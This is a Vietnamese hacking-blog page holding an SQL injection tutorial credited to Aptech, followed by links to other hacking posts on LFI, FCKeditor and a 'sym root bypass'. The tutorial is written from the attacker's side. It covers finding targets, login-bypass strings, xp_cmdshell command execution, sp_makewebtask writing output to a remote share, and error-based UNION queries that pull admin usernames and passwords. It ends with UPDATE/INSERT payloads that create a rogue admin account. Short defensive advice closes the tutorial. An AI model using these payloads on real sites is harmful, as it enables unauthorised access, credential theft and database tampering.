Tấn công kiểu SQL Injection --- Của Aptech

<div dir="ltr" style="text-align: left;" trbidi="on"> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">1.SQL Injection là gì?</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, ...</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">2. Tìm kiếm mục tiêu</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Có thể tìm các trang web cho phép submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng, chẳng hạn như các trang login, search, feedback, ...</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Ví dụ:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>http://yoursite.com/index.asp?id=10</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Một số trang web chuyển tham số qua các field ẩn, phải xem mã HTML mới thấy rõ. Ví dụ như ở dưới.</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em><FORM action=Search/search.asp method=post><br /><input type=hidden name=A value=C><br /></FORM></em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">3. Kiểm tra chỗ yếu của trang web</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Thử submit các field username, password hoặc field id, .. bằng hi' or 1=1--</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>Login: hi' or 1=1--<br />Password: hi' or 1=1--<br />http://yoursite.com/index.asp?id=hi' or 1=1--</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Nếu site chuyển tham số qua field ẩn, hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp. Ví dụ:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em><FORM action=http://yoursite.com/Search/search.asp method=post><br /><input type=hidden name=A value="hi' or 1=1--"><br /></FORM></em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Nếu thành công, thì có thể login vào mà không cần phải biết username và password</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">4. Tại sao ' or 1=1-- có thể vượt qua phần kiểm tra đăng nhập?</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Giả sử như có một trang ASP liên kết đến một ASP trang khác với URL như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>http://yoursite.com/index.asp?category=food</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Trong URL trên, biến 'category' được gán giá trị là 'food'. Mã ASP của trang này có thể như sau (đây chỉ là ví dụ thôi):</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>v_cat = request("category")<br />sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"<br />set rs=conn.execute(sqlstr)</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> v_cat sẽ chứa giá trị của biến request("category") là 'food' và câu lệnh SQL tiếp theo sẽ là:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>SELECT * FROM product WHERE PCategory='food'</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory='food'</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Nếu thay đổi URL trên thành http://yoursite.com/index.asp?category=food' or 1=1--, biến v_cat sẽ chứa giá trị "food' or 1=1-- " và dòng lệnh SQL query sẽ là:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>SELECT * FROM product WHERE PCategory='food' or 1=1--'</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Dòng query trên sẽ select mọi thứ trong bảng product bất chấp giá trị của trường PCategory có bằng 'food' hay không. Hai dấu gạch ngang (--) chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau "--" sẽ bị bỏ qua. Đối với MySQL, hãy thay "--" thành "#"</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Ngoài ra, cũng có thể thử cách khác bằng cách submit ' or 'a'='a. Dòng SQL query bây giờ sẽ là:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>SELECT * FROM product WHERE PCategory='food' or 'a'='a'</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Một số loại dữ liệu khác mà cũng nên thử submit để biết xem trang web có gặp lỗi hay không:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>' or 1=1--</em></div> <div align="justify"> <em>" or 1=1--</em></div> <div align="justify"> <em>or 1=1--</em></div> <div align="justify"> <em>' or 'a'='a</em></div> <div align="justify"> <em>" or "a"="a</em></div> <div align="justify"> <em>') or ('a'='a</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">5. Thi hành lệnh từ xa bằng SQL Injection</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Nếu cài đặt với chế độ mặc định mà không có điều chỉnh gì, MS SQL Server sẽ chạy ở mức SYSTEM, tương đương với mức truy cập Administrator trên Windows. Có thể dùng store procedure xp_cmdshell trong CSDL master để thi hành lệnh từ xa:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>'; exec master..xp_cmdshell 'ping 10.10.1.2'--</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Hãy thử dùng dấu nháy đôi (") nếu dấu nháy đơn (') không làm việc.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Dấu chấm phẩy (sẽ kết thúc dòng SQL query hiện tại và cho phép thi hành một SQL command mới. Để kiểm tra xem lệnh trên có được thi hành hay không, có thể listen các ICMP packet từ 10.10.1.2 bằng tcpdump như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>#tcpdump icmp</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Nếu nhận được ping request từ 10.10.1.2 nghĩa là lệnh đã được thi hành.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong>6. Nhận output của SQL query</strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Có thể dùng sp_makewebtask để ghi các output của SQL query ra một file HTML</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Chú ý: folder "<strong>share</strong>" phải được share cho Everyone trước.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">7. Nhận dữ liệu qua 'database using ODBC error message'</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Các thông báo lỗi của MS SQL Server thường đưa cho bạn những thông tin quan trọng. Lấy ví dụ ở trên http://yoursite.com/index.asp?id=10, bây giờ chúng ta thử hợp nhất integer '10' với một string khác lấy từ CSDL:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Bảng INFORMATION_SCHEMA.TABLES của hệ thống SQL Server chứa thông tin về tất cả các bảng (table) có trên server. Trường TABLE_NAME chứa tên của mỗi bảng trong CSDL. Chúng ta chọn nó bởi vì chúng ta biết rằng nó luôn tồn tại. Query của chúng ta là:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Dòng query này sẽ trả về tên của bảng đầu tiên trong CSDL</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi chúng ta kết hợp chuỗi này với số integer 10 qua statement UNION, MS SQL Server sẽ cố thử chuyển một string (nvarchar) thành một số integer. Điều này sẽ gặp lỗi nếu như không chuyển được nvarchar sang int, server sẽ hiện thông báo lỗi sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Thông báo lỗi trên cho biết giá trị muốn chuyển sang integer nhưng không được, "table1". Đây cũng chính là tên của bảng đầu tiên trong CSDL mà chúng ta đang muốn có.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Để lấy tên của tên của bảng tiếp theo, có thể dùng query sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--</em></blockquote> <div style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Cũng có thể thử tìm dữ liệu bằng cách khác thông qua statement LIKE của câu lệnh SQL:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <div align="justify"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--</em></div> </blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể là:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Mẫu so sánh '%25login%25' sẽ tương đương với %login% trong SQL Server. Như thấy trong thông báo lỗi trên, chúng ta có thể xác định được tên của một table quan trọng là "admin_login".</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">8. Xác định tên của các column trong table</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Có thể khai thác như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Như vậy tên của column đầu tiên là "login_id". Để lấy tên của các column tiếp theo, có thể dùng mệnh đề logic NOT IN () như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Làm tương tự như trên, có thể lấy được tên của các column còn lại như "password", "details". Khi đó ta lấy tên của các column này qua các thông báo lỗi của SQL Server, như ví dụ sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e14'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">9. Thu thập các dữ liệu quan trọng</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Chúng ta đã xác định được các tên của các table và column quan trọng. Chúng ta sẽ thu thập các thông tin quan trọng từ các table và column này.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Có thể lấy login_name đầu tiên trong table "admin_login" như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Dễ dàng nhận ra được admin user đầu tiên có login_name là "neo". Hãy thử lấy password của "neo" như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đó thông báo lỗi của SQL Server có thể như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Và bây giờ là đã có thể login vào với username là "neo" và password là "m4trix".</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">10. Nhận các numeric string</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Có một hạn chế nhỏ đối với phương pháp trên. Chúng ta không thể nhận được các error message nếu server có thể chuyển text đúng ở dạng số (text chỉ chứa các kí tự số từ 0 đến 9). Giả sử như password của "trinity" là "31173". Vậy nếu ta thi hành lệnh sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Thì khi đó chỉ nhận được thông báo lỗi "Page Not Found". Lý do bởi vì server có thể chuyển passoword "31173" sang dạng số trước khi UNION với integer 10. Để giải quyết vấn đề này, chúng ta có thể thêm một vài kí tự alphabet vào numeric string này để làm thất bại sự chuyển đổi từ text sang số của server. Dòng query mới như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Chúng ta dùng dấu cộng (+) để nối thêm text vào password (ASCII code của '+' là 0x2b). Chúng ta thêm chuỗi '(space)morpheus' vào cuối password để tạo ra một string mới không phải numeric string là '31173 morpheus'. Khi hàm convert() được gọi để chuyển '31173 morpheus' sang integer, SQL server sẽ phát lỗi ODBC error message sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</em><br /> <em>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.</em><br /> <em>/index.asp, line 5</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Và nghĩa là bây giờ ta cũng có thể login vào với username 'trinity' và password là '31173'</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">11. Thay đổi dữ liệu (Update/Insert) của CSDL</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Khi đã có tên của tất cả các column trong table, có thể sử dụng statement UPDATE hoặc INSERT để sửa đổi/tạo mới một record vào table này.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Để thay đổi password của "neo", có thể làm như sau:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Hoặc nếu bạn muốn một record mới vào table:</div> <blockquote style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <em>http://yoursite.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--</em></blockquote> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Và bây giờ có thể login vào với username "neo2" và password là "newpas5"</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">12. Ngăn chặn SQL Injection</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Hãy loại bỏ các kí tự meta như '"/\; và các kí tự extend như NULL, CR, LF, ... trong các string nhận được từ:</div> <ul style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <li>input do người dùng đệ trình</li> <li>các tham số từ URL</li> <li>các giá trị từ cookie</li> </ul> <div style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi query SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Thay đổi "Startup and run SQL Server" dùng mức low privilege user trong tab SQL Server Security.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Xóa các stored procedure trong database master mà không dùng như:</div> <ul style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <li>xp_cmdshell</li> <li>xp_startmail</li> <li>xp_sendmail</li> <li>sp_makewebtask</li> </ul> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> <strong><span style="color: navy;">13. Ngăn chặn SQL Injection trong ASP.NET</span></strong></div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Các cách thức ngăn chặn SQL Injection được trình bày ở phần 12 đã bao quát đủ phương pháp, nhưng trong ASP.NET có cách ngăn chặn đơn giản là sử dụng các Parameters khi làm việc với object SqlCommand (hoặc OleDbCommand) chứ không sử dụng các câu lệnh SQL trực tiếp. Khi đó .NET sẽ tự động validate kiểu dữ liệu, nội dung dữ liệu trước khi thực hiện câu lệnh SQL.</div> <div align="justify" style="background-color: #fbfbfb; color: #000066; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"> Ngoài ra, cũng cần kiểm soát tốt các thông báo lỗi. Và mặc định trong ASP.NET là thông báo lỗi sẽ không được thông báo chi tiết khi không chạy trên localhost.</div> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> </span></div>

Tấn công kiểu SQL Injection --- Của Aptech

1.SQL Injection là gì? SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL qu...

Read More »

[TUT] SQL dạng HTML

<div dir="ltr" style="text-align: left;" trbidi="on"> <blockquote class="tr_bq"> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Link Download</span><span style="color: red; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="http://www.mediafire.com/?6hh2ykae8xpuq2q">http://www.mediafire.com/?6hh2ykae8xpuq2q</a></span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Hoặc</span><span style="color: red; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="https://www.box.com/s/3m0xluf10xdhcdw95qzu">https://www.box.com/s/3m0xluf10xdhcdw95qzu</a></span></blockquote> </div>

[TUT] SQL dạng HTML

Link Download http://www.mediafire.com/?6hh2ykae8xpuq2q Hoặc https://www.box.com/s/3m0xluf10xdhcdw95qzu

Read More »

Bug LFI + FCKeditor

<div dir="ltr" style="text-align: left;" trbidi="on"> <object height="360" width="640"><param name="movie" value="//www.youtube-nocookie.com/v/FHxd6HF1F-A?hl=vi_VN&version=3"></param> <param name="allowFullScreen" value="true"></param> <param name="allowscriptaccess" value="always"></param> <embed src="//www.youtube-nocookie.com/v/FHxd6HF1F-A?hl=vi_VN&version=3" type="application/x-shockwave-flash" width="640" height="360" allowscriptaccess="always" allowfullscreen="true"></embed></object></div>

Bug LFI + FCKeditor

Read More »

Sym root bypass open port nếu server cho chạy python

